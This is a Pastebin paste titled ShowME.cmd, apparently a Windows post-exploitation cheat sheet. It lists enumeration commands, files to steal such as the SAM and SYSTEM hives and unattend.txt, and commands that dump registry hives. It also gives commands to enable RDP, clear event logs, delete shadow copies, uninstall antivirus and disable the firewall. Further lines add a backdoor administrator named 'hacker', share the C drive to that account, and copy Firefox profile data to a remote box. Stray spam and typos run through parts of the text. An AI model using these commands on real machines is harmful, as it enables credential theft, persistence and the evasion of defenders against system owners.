Advertisement
opexxx

ShowME.cmd

Mar 25th, 2020
1,669
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.97 KB | None | 0 0
  1.  
  2. #system
  3. whoami
  4. whoami /all
  5. set
  6.  
  7. fsutil fsinfo drives
  8. reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
  9.  
  10. #networking
  11. ipconfig /all
  12. ipconfig /displaydns
  13. netstat -nabo
  14. netstat -r
  15. netstat -na | findstr :445
  16. netstat -nao | findstr LISTENING
  17. netstat -anob | findstr "services, process or port"
  18. netsh diag show all
  19. net view
  20. net view /domain
  21. net view /domain:otherdomain
  22.  
  23. net user %USERNAME% /domain
  24. net user /domain
  25. net accounts
  26. net accounts /domain
  27. net localgroup administrators
  28. net group "Domain Admins" /domain
  29.  
  30. net group "Enterprise Admins" /domain
  31. net group "Domain Controllers" r/domain
  32. net share
  33. net session | find / "\\"
  34. arp -a
  35. route print
  36. browstat
  37. netsh wlprofiles show profiles
  38. netsh wlan export profile folder=. key=clear
  39. netsh w`lan [start|stop] hostednetwork
  40. netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
  41. netsh wlan set hostednetwork mode=[allow|disallow]
  42. wmic ntdomain list
  43.  
  44. #configs
  45. gpresult /z
  46. sc qc <servicename>
  47. sc query
  48. sc queryex
  49. type %WINDIR%\System32\drivers\etc\hosts
  50. echo %COMSPEC%
  51. c:\windows\system32\gathernetworkinfo.vbs
  52.  
  53. #finding important files
  54. tree C:\ /f /a > C:\output_of_tree.txt
  55. dir /a
  56. dir /b /s [Directory or Filename]
  57. dir \ /s /b | find /I "searchstring"
  58. dir \ /s /b | find /I "mike"
  59. command | find /c /v ""
  60.  
  61. #files to pull (if possible)
  62. %SYSTEMDRIVE%\pagefile.sys
  63. %WINDIR%\debug\NetSetup.log
  64. %WINDIR%\repair\sam
  65. %WINDIR%\repair\system
  66. %WINDIR%\repair\software
  67. %WINDIR%\repair\security
  68. %WINDIR%\iis6.log (5, 6 or 7)
  69. %WINDIR%\system32\logfiles\httperr\httperr1.log
  70. %SystemDrive%\inetpub\logs\LogFiles
  71. %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
  72. %WINDIR%\system32\config\AppEvent.Evt
  73. %WINDIR%\system32\config\SecEvent.Evt
  74. %WINDIR%\system32\config\SysEvent.Evt
  75. %WINDIR%\system32\config\default.sav
  76. %WINDIR%\system32\config\security.sav
  77. %WINDIR%\system32\config\software.sav
  78. %WINDIR%\system32\config\system.sav
  79. %WINDIR%\system32\CCM\logs\*.log
  80. %USERPROFILE%\ntuser.dat
  81. %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
  82. %WINDIR%\System32\drivers\etc\hosts
  83. unattend.txt, unattend.xml, sysprep.inf
  84.  
  85. #remote system access
  86. net share \\computername
  87. tasklist /V /S computername
  88. qwinsta /SERVER:computername
  89. qprocess /SERVER:computername *
  90. net use \\computername
  91. net use \\computername /user:DOMAIN\username password
  92. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  93. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
  94.  
  95. #autostart dirs
  96. %SystemDrive%\ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\
  97.  
  98. %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
  99. %SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\
  100. %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\
  101.  
  102. #Persistence
  103. WMI
  104. wmic bios
  105. wmic qfe qfe get hotfixid
  106. (This gets patches IDs)
  107. wmic startupwmic service
  108. wmic process get caption,executablepath,commandline
  109. wmic process call create "process_name" (executes a program)
  110. wmic process where name="process_name" call terminate (terminates program)
  111. wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
  112. wmic useraccount (usernames, sid, and various security related goodies)
  113. wmic useraccount get /ALL
  114. wmic share get /ALL (you can use ? for gets help ! )
  115. wmic startup list full (this can be a huge list!!!)
  116. wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)WE PRESENT YOU PORNHUB.COM
  117. Reg Command exit
  118. reg save HKLM\Security security.hive (Save security hive to a file)
  119. reg save HKLM\System system.hive (Save system hive to a file)
  120. reg save HKLM\SAM sam.hive (Save sam to a file)=
  121. reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
  122. reg export [RegDomain]\[Key] [FileName]
  123. reg import [FileName ]
  124. reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
  125.  
  126. rem Deleting Logs
  127. wevtutil el (list logs)
  128. wevtutil cl <LogName> (Clear specific lowbadming)
  129. del %WINDIR%\*.log /a /s /q /f
  130.  
  131. Uninstalling Software "AntiVirus" (Non interactive)
  132. wmic product get name /value (this gets software names)
  133. wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)
  134.  
  135. # Other (to be sorted)
  136. pkgmgr usefull /iu :"Package"
  137. pkgmgr usefull /iu :"TelnetServer" (Install Telnet Service ...)
  138. pkgmgr /iu:"TelnetClient" (Client )
  139. rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
  140. wscript.exe <script js/vbs> - Invasive - may create message boxes-invasive-
  141. cscript.exe <script js/vbs/c#>
  142. xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff
  143. OS SPECIFICwmicWin2k3
  144. winpop stat domainname
  145. vssadmin.exe delete shadows /all /quiet (delete’s shadow copies for cleanup)
  146.  
  147. rem Vista/7
  148. winstat features
  149. wbadmin get status
  150. wbadmin get items
  151. gpresult /H gpols.htm
  152. bcdedit /export <filename>
  153.  
  154. rem Vista SP1/7/2008/2008R2 (x86 & x64)
  155.  
  156. Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
  157. *Note* Works well after bypassuac + getsystem (requires system privileges)
  158. *Note2* For Dism.exe to work on x64 systems, the long commands are necessary
  159.  
  160. To list features which can be enabled/disabled:
  161. %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features
  162.  
  163. To enable a feature (TFTP client for example):
  164. %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP
  165.  
  166. To disable a feature (again TFTP client):
  167. %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP
  168.  
  169. Invasive or Altering Commands
  170.  
  171. Command
  172. Description
  173. net user hacker hacker /add
  174. Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
  175. net localgroup administrators /add hacker
  176. or
  177. net localgroup administrators hacker /add
  178. Adds the new user ‘hacker’ to the local administrators group
  179. net share nothing$=C:\ /grant:hacker,FULL /unlimited
  180. Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.
  181.  
  182. One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added ournetsh selves as a local admin this isn’t a problem but it is something to keep in mind
  183. net user username /active:yes /domain
  184. Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
  185. netsh firewall set opmode disable
  186. Disables the local windows firewall
  187. netsh firewall set opmode enable
  188. Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement